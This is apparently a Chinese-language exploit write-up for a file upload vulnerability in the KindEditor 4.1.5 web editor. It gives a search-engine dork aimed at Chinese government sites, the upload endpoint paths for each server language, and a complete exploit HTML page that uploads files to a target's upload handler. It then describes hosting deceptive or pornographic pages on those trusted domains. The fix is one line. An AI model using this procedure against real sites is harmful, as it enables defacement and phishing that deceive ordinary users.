網站滲透富文本編輯器 kindeditor4.1.5 文件上傳漏洞

漏洞等級：高危

Kindeditor是一套開源的HTML可視化編輯器，主要用于讓用戶在網站上獲得所見即所得編輯效果，兼容IE、Firefox、Chrome、Safari、Opera等主流瀏覽器。

漏洞描述：

Kindeditor能夠上傳doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持

Java、.NET、PHP、ASP等程序。

漏洞利用：

通過搜索引擎找到目標，比如:搜索關鍵字 inurl:gov.cn/kindeditor

通過訪問http://www.xx.gov.cn/kindeditor/kindeditor.js，查看kindeditor版本是否含有漏洞（<=4.1.5）

獲得網站使用的開發語言，并確定kindeditor上傳文件地址，各種語言上傳地址如下：

• /asp/upload_json.asp

• /asp.net/upload_json.ashx

• /jsp/upload_json.jsp

• /php/upload_json.php

創建exploit.html頁面，編輯內容如下：

<html><head><title>kindeditorexploit</title><scriptsrc="http://www.xx.gov.cn/kindeditor/kindeditor.js"></ｓｃｒｉｐｔ><ｓｃｒｉｐｔ>KindEditor.ready(function(K){varuploadbutton=K.uploadbutton({button:K('#uploadButton')[0],fieldName:'imgFile',url:'http://www.xx.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file',afterUpload:function(data){if(data.error===0){varurl=K.formatUrl(data.url,'absolute');K('#url').val(url);}},});uploadbutton.fileBox.change(function(e){uploadbutton.submit();});});</ｓｃｒｉｐｔ></head><body><pclass="upload"><inputtype="button"id="uploadButton"value="Upload"/></p></body></html>

瀏覽器訪問頁面效果如下：

選擇文件test.txt文件(文件內容：test…2019/03/04)，網站審核元素，查看返回結果，如圖：

訪問網址結果如下：

漏洞影響：

由于該漏洞無法上傳php,asp,java等類型文件，所以無法getshell，但是可以上傳包含色情、**等類欺騙性html網頁，如果上傳到***類網站，不法分子會利用***域名的權威性達到欺騙普通用戶的目的，所以危害性很大。

解決辦法：

限制上傳文件類型